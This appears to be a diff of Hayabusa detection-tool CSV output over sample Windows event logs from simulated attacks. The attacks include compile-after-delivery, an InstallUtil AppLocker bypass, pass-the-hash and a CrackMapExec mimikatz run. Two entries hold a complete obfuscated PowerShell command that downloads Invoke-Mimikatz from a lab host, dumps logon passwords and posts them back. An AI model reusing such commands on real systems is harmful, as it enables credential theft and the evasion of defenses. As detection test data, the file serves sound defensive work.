+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0xa6f5fa4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fa4 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-13 23:30:58.226 +09:00,FS03.offsec.lan,4624,info,,Logon Type 2 - Interactive,User: hack1 | Computer: FS03 | IP Addr: ::1 | LID: 0xa6f5fc2 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4688,4648,4624-Runas execution with different user.evtx"
+2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00 | Hash: SHA1=22A72E39D307BC628093B043EF058DB1310BBF4B,MD5=28D96A80131C05E552066C798C0D8ACB,SHA256=C5270C0D8718C66382240DB538F9BACDED8DB55424768C2D942A6210B96B2720,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.774 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:42:34.415 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157add,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157afc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b29,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b4e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b70,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157b8f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8157bac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 97 , 108,105, 100,97,116 ,105 ,111 ,110,67 ,97 ,108, 108,98, 97,99 ,107, 32,61, 32, 123,36,116,114 ,117 , 101 ,125,10, 91 , 83 ,121 , 115 ,116, 101 , 109 ,46 ,78, 101 ,116,46,83, 101 ,114, 118 ,105, 99, 101 , 80,111 , 105 ,110 ,116, 77, 97,110 ,97 ,103,101,114 ,93, 58,58, 83 ,101,99 , 117 ,114 , 105, 116 , 121 , 80,114 , 111 ,116 ,111 ,99 , 111,108 , 32 , 61 , 32,91 ,83 , 121 , 115, 116, 101, 109,46,78, 101, 116 ,46 ,83 ,101 , 99 , 117,114,105, 116 ,121,80 , 114 ,111 , 116, 111,99, 111,108,84, 121,112, 101 , 93,39 , 83 , 115 , 108 ,51 , 44 ,84 ,108,115, 44 ,84, 108,115, 49,49 , 44, 84,108 , 115 ,49, 50, 39,10, 73,69 ,88, 32 , 40, 78,101 , 119 , 45 ,79, 98, 106 , 101 , 99 , 116, 32 ,78,101 ,116 , 46,87 , 101,98 , 67, 108 , 105 ,101,110,116,41,46,68 , 111, 119,110 ,108 , 111 ,97,100 ,83 , 116 , 114, 105 , 110, 103,40 ,39,104 ,116,116, 112 ,115, 58,47 , 47 ,49, 48,46 ,50,51 ,46 , 49, 50 ,51, 46,49, 49 ,58 , 50 ,54 ,50, 54 , 47 , 73 ,110, 118 , 111, 107 ,101,45,77 , 105 ,109, 105 , 107, 97 , 116 , 122, 46 ,112,115, 49 ,39, 41,10, 36 ,99 ,109 ,100 ,32,61,32,73, 110 , 118,111, 107, 101 ,45 , 77, 105, 109 ,105, 107 , 97, 116,122 ,32 ,45, 67,111, 109 ,109 ,97 ,110,100, 32,39 ,112,114 ,105, 118, 105,108 , 101, 103,101,58 ,58,100 ,101 , 98,117,103 ,32,115,101,107,117 ,114,108 ,115 ,97 ,58 , 58 , 108, 111 ,103, 111,110, 112 ,97,115 , 115 , 119,111, 114,100 , 115 , 32 , 101, 120 ,105 , 116,39,10 , 36, 114,101 ,113 ,117 , 101, 115 , 116,32,61, 32 , 91 ,83 , 121 , 115,116 ,101, 109 , 46,78, 101,116, 46 ,87,101,98,82,101 , 113 ,117,101 , 115 ,116 ,93, 58 , 58 , 67,114 ,101, 97 , 116, 101 , 40 ,39 ,104,116 ,116 , 112 ,115, 58 , 47 , 47, 49,48 ,46, 50 , 51 , 46 ,49, 50 , 51, 46,49 ,49, 58 , 50,54 , 50,54 , 47 ,39, 41,10 ,36 ,114, 101, 113,117,101 ,115,116 , 46,77, 101,116,104 , 111 , 100 , 32 , 61, 32,39 , 80, 79 , 83,84,39 ,10 , 36 ,114 , 101, 113 , 117 , 101 ,115,116 , 46 ,67,111, 110 , 116, 101, 110,116 ,84,121, 112,101,32 , 61 , 32 ,39 ,97 ,112 ,112 ,108 , 105 , 99,97 , 116, 105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
+2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx"
